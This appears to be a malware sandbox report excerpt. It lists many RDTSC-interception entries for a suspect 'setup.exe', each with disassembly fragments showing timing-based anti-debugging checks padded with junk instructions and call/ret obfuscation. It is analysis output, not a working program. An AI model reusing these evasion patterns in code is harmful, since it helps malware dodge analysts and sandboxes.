Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B8469 second address: 4B846E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B761E second address: 4B7624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B7624 second address: 4B764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F47CD361215h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F47CD361206h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B9419 second address: 4B9425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B8635 second address: 4B863E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B9580 second address: 4B965B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F47CD34662Dh 0x0000000c popad 0x0000000d nop 0x0000000e or dword ptr [ebp+122D1ABAh], ebx 0x00000014 mov dword ptr [ebp+1246EB6Eh], eax 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F47CD346618h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b call 00007F47CD34661Eh 0x00000040 jmp 00007F47CD346625h 0x00000045 pop ebx 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov dword ptr [ebp+1245B298h], esi 0x00000053 mov eax, dword ptr [ebp+122D0879h] 0x00000059 jl 00007F47CD34661Ch 0x0000005f and ebx, 3AF22282h 0x00000065 pushad 0x00000066 call 00007F47CD346620h 0x0000006b mov edi, edx 0x0000006d pop esi 0x0000006e popad 0x0000006f push FFFFFFFFh 0x00000071 mov bh, 23h 0x00000073 pushad 0x00000074 mov eax, dword ptr [ebp+122D2E81h] 0x0000007a call 00007F47CD34661Fh 0x0000007f and esi, dword ptr [ebp+122D1C99h] 0x00000085 pop edx 0x00000086 popad 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a push ecx 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B965B second address: 4B9660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B9660 second address: 4B9666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B9666 second address: 4B967E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47CD36120Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B967E second address: 4B968F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B968F second address: 4B9693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4BA61D second address: 4BA621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4BA621 second address: 4BA6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F47CD361210h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F47CD361208h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+1246ED58h], ebx 0x0000002e mov bx, E2EBh 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2CFDh] 0x00000046 mov eax, dword ptr [ebp+122D067Dh] 0x0000004c mov dword ptr [ebp+122D1BD6h], eax 0x00000052 push FFFFFFFFh 0x00000054 call 00007F47CD361211h 0x00000059 add bx, 9DCCh 0x0000005e pop edi 0x0000005f mov ebx, dword ptr [ebp+122D2DF5h] 0x00000065 push eax 0x00000066 push esi 0x00000067 push eax 0x00000068 push edx 0x00000069 push edi 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4BA6AD second address: 4BA6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C794A second address: 4C7950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB067 second address: 4CB081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F47CD346616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F47CD34661Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB081 second address: 4CB098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361213h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB098 second address: 4CB09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CF143 second address: 4CF147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CF147 second address: 4CF15B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346620h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CF15B second address: 4CF169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F47CD36120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CFBBB second address: 4CFBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CFECC second address: 4CFED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CFED0 second address: 4CFEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CFEDC second address: 4CFEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CFEE0 second address: 4CFEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D0050 second address: 4D0055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D0055 second address: 4D0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F47CD346616h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D0063 second address: 4D00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F47CD361211h 0x00000011 pop ecx 0x00000012 jg 00007F47CD361231h 0x00000018 jmp 00007F47CD361216h 0x0000001d jmp 00007F47CD361215h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00B2 second address: 4D00BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F47CD346616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D0367 second address: 4D0376 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F47CD361206h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D0376 second address: 4D039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47CD346621h 0x0000000c jmp 00007F47CD34661Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 464BB2 second address: 464BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 464BB6 second address: 464BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F47CD34662Dh 0x0000000f jmp 00007F47CD346621h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 464BDF second address: 464BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 464BE3 second address: 464BF7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD34661Ch 0x00000008 jnc 00007F47CD346616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D386D second address: 4D3887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F47CD361211h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3887 second address: 4D3893 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3893 second address: 4D38A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D38A4 second address: 4D38B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47CD34661Bh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49F36D second address: 49F373 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49F821 second address: 49F827 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49F827 second address: 49F870 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47CD36120Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 65211E51h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F47CD361208h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2C18h], esi 0x00000031 push 329B9F1Bh 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edi 0x0000003b pop edi 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49F870 second address: 49F881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49F881 second address: 49F887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49F887 second address: 49F88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49FCB2 second address: 49FD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47CD361218h 0x0000000c pop edx 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F47CD361208h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov cx, 5F37h 0x0000002c jmp 00007F47CD36120Bh 0x00000031 jmp 00007F47CD361218h 0x00000036 push 00000004h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F47CD361208h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49FD48 second address: 49FD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49FD4D second address: 49FD5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49FD5B second address: 49FD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A015A second address: 4A017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A017C second address: 4A0180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A0180 second address: 4A019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A019B second address: 4A01CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD346624h 0x00000008 jmp 00007F47CD34661Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push ebx 0x00000011 or edx, dword ptr [ebp+122D2E85h] 0x00000017 pop edi 0x00000018 push 0000001Eh 0x0000001a or dword ptr [ebp+122D1A21h], edx 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push edi 0x00000026 pop edi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A01CB second address: 4A01CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A01CF second address: 4A01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A01D5 second address: 4A01DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A0304 second address: 4A0319 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47CD34661Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A0532 second address: 4A056A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47CD361217h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A056A second address: 4A0574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A0574 second address: 4A0578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A0578 second address: 4A0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 stc 0x0000000a lea eax, dword ptr [ebp+1248A036h] 0x00000010 mov dword ptr [ebp+122D34E0h], eax 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A0594 second address: 4A059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47CD361206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A059F second address: 4A05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3C8E second address: 4D3CA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F47CD361206h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jnl 00007F47CD361206h 0x00000013 ja 00007F47CD361206h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3DD3 second address: 4D3DF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47CD346621h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F47CD346616h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3DF7 second address: 4D3DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3DFB second address: 4D3E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3E01 second address: 4D3E06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D3E06 second address: 4D3E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D4289 second address: 4D428D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D428D second address: 4D429B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D429B second address: 4D42A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F47CD361206h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4541EA second address: 454202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F47CD34661Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 454202 second address: 454217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47CD36120Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC1A5 second address: 4DC1B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC754 second address: 4DC75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC75A second address: 4DC79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346625h 0x00000007 pushad 0x00000008 jmp 00007F47CD346627h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 ja 00007F47CD346648h 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F47CD346616h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC79C second address: 4DC7A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC7A0 second address: 4DC7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F47CD346620h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC7BA second address: 4DC7BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC8FD second address: 4DC903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DC903 second address: 4DC90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47CD361206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 45FBB5 second address: 45FBC5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2BB0 second address: 4E2BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2BB7 second address: 4E2BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD34661Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2D23 second address: 4E2D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2FE1 second address: 4E2FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2FE5 second address: 4E2FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
